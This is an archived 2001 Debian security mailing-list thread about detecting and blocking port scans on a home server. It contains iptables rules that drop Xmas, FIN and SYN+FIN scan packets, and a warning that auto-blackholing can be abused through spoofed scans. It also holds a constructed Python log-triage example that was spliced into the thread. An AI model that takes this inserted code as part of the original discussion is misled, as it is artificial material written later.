> It is my first time I'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many.
>
> Is there a package for it in debian? Or do I have to install something else.
>
> Thanks in advance,
>
> Rudy
> --
> e: [EMAIL PROTECTED]                       phone: 0486/690159
> url: http://studwww.rug.ac.be/~rgevaert/   http://zeus.rug.ac.be
RE: detecting portscanning
On Thu, 24 May 2001, Ed Street wrote:

> Hello,
>
> there's several methods to tell that.
>
> a) use a product like portsentry
> b) use iptables/ipchains to reject all forms of portscans
> c) don't connect the box to the inet as portscans are a fact of life ;)
>
> portsentry will trashcan any system that attempts to portscan you. If you're using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans.
>
> iptables has an awesome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literally take HOURS to return nothing.

Ok thanks, I'll use iptables when I get my network running. Now it is just a standalone box. I'm running ippl and it logs most things. It will work for now I think ;)

Thanks to everyone for all the help!

Greetings,

Rudy
--
e: [EMAIL PROTECTED]                       phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/   http://zeus.rug.ac.be
RE: detecting portscanning
# echo Rejecting Portscans
#
#
# Reject Xmas Scans
#
# Generic dirty interface mapping
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \
        --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
# This disallows ALL portscans that will hit the PREROUTING table
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \
        --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
#
#
# Reject Fin scans
#
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED \
        -j LOG --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED -j DROP
# This disallows ALL portscans that will hit the PREROUTING table
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN \
        -j LOG --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN -j DROP
#
#
# Reject ANY station that opens and immediately closes a connection
# Some portscanners do this
#
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j LOG \
        --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j DROP
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN \
        -j LOG --log-level $LOG_LEVEL \
        -m limit --limit $LIMIT_RATE
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN -j DROP
#
#
# invalid crap
#
$IPTABLES -t mangle -A PREROUTING -j LOG --log-level $LOG_LEVEL \
        -m state --state INVALID \
        -m limit --limit $LIMIT_RATE
#

This isn't complete as the SYN scan will still get thru BUT it will take ages to show anything. Also use of rp_filter ('spoof' protection) helps out too.

Ed

-----Original Message-----
From: S.Salman Ahmed [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 8:11 PM
To: debian-security@lists.debian.org
Subject: RE: detecting portscanning

> >>>>> "Ed" == Ed Street [EMAIL PROTECTED] writes:
>
>     Ed> iptables has an awesome mechanism for portscans ;) in fact you
>     Ed> can set it up so that all portscans (well most I should say)
>     Ed> will literally take HOURS to return nothing.
>
> What iptables rule(s) would cause that behaviour ?
>
> --
> Salman Ahmed
> ssahmed AT pathcom DOT com
Re: detecting portscanning
On Thu, May 24, 2001 at 03:47:33PM -0600, Tim Uckun wrote:

> > The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware.
>
> Although it binds to all the ports portsentry can blackhole the scanner as soon as it detects it with an IP chains rule. Once the user starts a scan they will be immediately blackholed and will never even complete the scan.

Don't do that unless you know what you are doing. If somebody fakes a portscan coming from somewhere you really wouldn't want to blackhole (e.g. your name server), you could lose bigtime.

If you know what you're doing, and understand the risks, then do whatever tickles your fancy. Just be careful about suggesting potentially dangerous stuff.

--
#define X(x,y) x##y
Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca)
"The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces!" -- Plautus, 200 BCE
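Ed's rules earlier in this thread log three TCP flag combinations (Xmas = FIN,URG,PSH; FIN alone; SYN+FIN) and Peter's warning is that a single spoofed packet must not be enough to firewall off your own name server. The following stand-alone Python is an added example that ties the two together over lines in the shape the iptables LOG target writes: it classifies each line by flags, counts distinct destination ports per source inside a time window, and refuses to auto-blackhole any source inside an allowlist. It is not code from the thread, from portsentry, ippl or snort; the log lines, addresses, window and thresholds are constructed for the example.

```python
"""Portscan triage over iptables LOG lines, with an allowlist guard.

Added example, not from any list post or from portsentry/snort.  The log
lines are constructed to look like what the LOG target writes (without a
--log-prefix); addresses are documentation ranges.
"""
from collections import defaultdict
from datetime import datetime
import ipaddress
import re

TCP_FLAGS = {"CWR", "ECE", "URG", "ACK", "PSH", "RST", "SYN", "FIN"}
_KV = re.compile(r"\b([A-Z]+)=(\S*)")
_TS = re.compile(r"^([A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)")


def parse_log_line(line):
    """Return the KEY=value fields plus 'ts' and the set of flag words, or None."""
    m = _TS.match(line)
    if not m or "PROTO=" not in line:
        return None
    fields = dict(_KV.findall(line))
    # syslog stamps carry no year; 1900 is fine for ordering within one log.
    fields["ts"] = datetime.strptime(m.group(1), "%b %d %H:%M:%S")
    fields["flags"] = {tok for tok in line.split() if tok in TCP_FLAGS}
    return fields


def classify_flags(flags):
    """Map a flag set to the signature Ed's --tcp-flags ALL rules drop, or None."""
    if flags == {"FIN", "URG", "PSH"}:
        return "xmas"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"SYN", "FIN"}:
        return "synfin"
    return None


def find_sweeps(records, min_ports=10, window_seconds=60):
    """Sources that touched at least min_ports distinct TCP ports inside the window."""
    by_src = defaultdict(list)
    for r in records:
        if r.get("PROTO") == "TCP" and "DPT" in r:
            by_src[r["SRC"]].append((r["ts"], int(r["DPT"])))
    sweeps = {}
    for src, events in by_src.items():
        events.sort()
        lo = 0
        for hi in range(len(events)):
            while (events[hi][0] - events[lo][0]).total_seconds() > window_seconds:
                lo += 1
            ports = {p for _, p in events[lo:hi + 1]}
            if len(ports) >= min_ports:
                sweeps[src] = max(sweeps.get(src, 0), len(ports))
    return sweeps


def should_blackhole(src, allowlist):
    """A packet with odd flags proves nothing about SRC=, which is trivially
    forged; never auto-block name servers, gateways or your own networks."""
    addr = ipaddress.ip_address(src)
    return not any(addr in net for net in allowlist)


def triage(lines, allowlist, min_ports=10, window_seconds=60):
    """Return (block, hold): suspects safe to blackhole, and those needing a human."""
    records = [r for r in map(parse_log_line, lines) if r]
    flagged = {r["SRC"] for r in records if classify_flags(r["flags"])}
    sweeps = find_sweeps(records, min_ports, window_seconds)
    suspects = flagged | set(sweeps)
    block = sorted(s for s in suspects if should_blackhole(s, allowlist))
    return block, sorted(suspects.difference(block))


def _line(sec, src, dpt, flags):
    # Constructed line in the LOG target's layout; flag words sit after RES=.
    return (f"May 24 23:11:{sec:02d} noogies kernel: IN=eth0 OUT= SRC={src} "
            f"DST=192.0.2.10 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 PROTO=TCP "
            f"SPT=40000 DPT={dpt} WINDOW=1024 RES=0x00 {flags} URGP=0")


SAMPLE_LOG = (
    [_line(i, "203.0.113.5", 20 + i, "SYN") for i in range(6)]   # SYN sweep over six ports
    + [_line(10, "203.0.113.9", 21, "FIN URG PSH")]              # Xmas probe
    + [_line(11, "192.0.2.53", 111, "SYN FIN")]                  # SYN+FIN, forged name-server source
    + [_line(12, "198.51.100.7", 22, "SYN")]                     # one ordinary ssh attempt
)
ALLOWLIST = [ipaddress.ip_network("192.0.2.0/24")]   # own net, name server included

if __name__ == "__main__":
    print(triage(SAMPLE_LOG, ALLOWLIST, min_ports=5))
```

On the sample the sweep source and the Xmas source end up on the block list, while the SYN+FIN line whose SRC= is the name server is held for a human, which is Peter's point in code. Two caveats for real logs: Ed's rules pass LOG through `-m limit`, so a fast scan is under-counted in the file and thresholds should allow for that; and nothing here is evidence of a completed handshake, so even the block list is only as trustworthy as the source address.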
Re: detecting portscanning
Hello,

--- Rudy Gevaert [EMAIL PROTECTED] wrote:

> It is my first time I'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many.
>
> Is there a package for it in debian? Or do I have to install something else.

Check out www.snort.org. Snort is capable of detecting portscans. Note that it detects not only portscans, but other strange activities (i.e. tracing, OS fingerprinting, etc) and attacks. You can download sources from the original site or get the *.deb from debian (it is included in the latest release).

=====
Regards,
Vladislav.
---
http://cybervlad.port5.com